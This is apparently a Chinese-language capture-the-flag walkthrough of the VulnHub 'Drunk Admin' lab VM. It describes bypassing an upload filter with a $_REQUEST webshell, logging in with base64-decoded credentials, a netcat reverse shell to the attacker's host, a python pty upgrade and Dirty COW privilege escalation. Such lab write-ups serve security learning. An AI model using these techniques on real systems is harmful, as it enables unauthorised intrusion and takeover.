VulnHub Drunk Admin Web Hacking Challenge：1

Drunk Admin Web Hacking Challenge: 1

项目地址：https://download.vulnhub.com/drunkadminhackingchallenge/drunk_admin_hacking_challenge.zip

是一个打包好的镜像文件

注意：导入 vmx 时一定要选择我已移动，否则没网

使用 Nmap 扫描出开放服务及操作系统版本

RCE

Upload（$_REQUEST[] 绕过）

8880 端口就是一个文件上传，但是上传后的文件重命名了

发现长度为 32 位，推测是 MD5 加密，预想的没错

去掉后缀也能访问

直接传木马会被拦截

加后缀和更改 MIME 类型也绕过不了

觉得是不是上传包含 $_POST[] 的代码会被检测绕不过去

换成 $_REQUEST[] 就可以

成功执行命令

弱口令

看下面升级交互式部分找到一个普通用户，尝试通过 Web 访问用户 bob 主目录中托管的 Web 内容

用隐藏文件尝试登录不行，最后 Base64 解密登录成功

登录成功拿到密文，应该是坐标

提权

nc -c 反弹 Shell

# -c 选项告诉 nc 在建立连接后，执行一个指定的命令
nc -c sh 192.168.202.128 9999

Python 升级为交互式 Shell

python -c 'import pty;pty.spawn("/bin/bash")'

翻源码看到了 WAF，果然是过滤了 $_POST[]

继续找到一个隐藏文件

发现一个普通用户

脏牛漏洞（CVE-2016-5195）

脚本链接：https://github.com/firefart/dirtycow/blob/master/dirty.c

服务器下载脚本编译运行

成功提权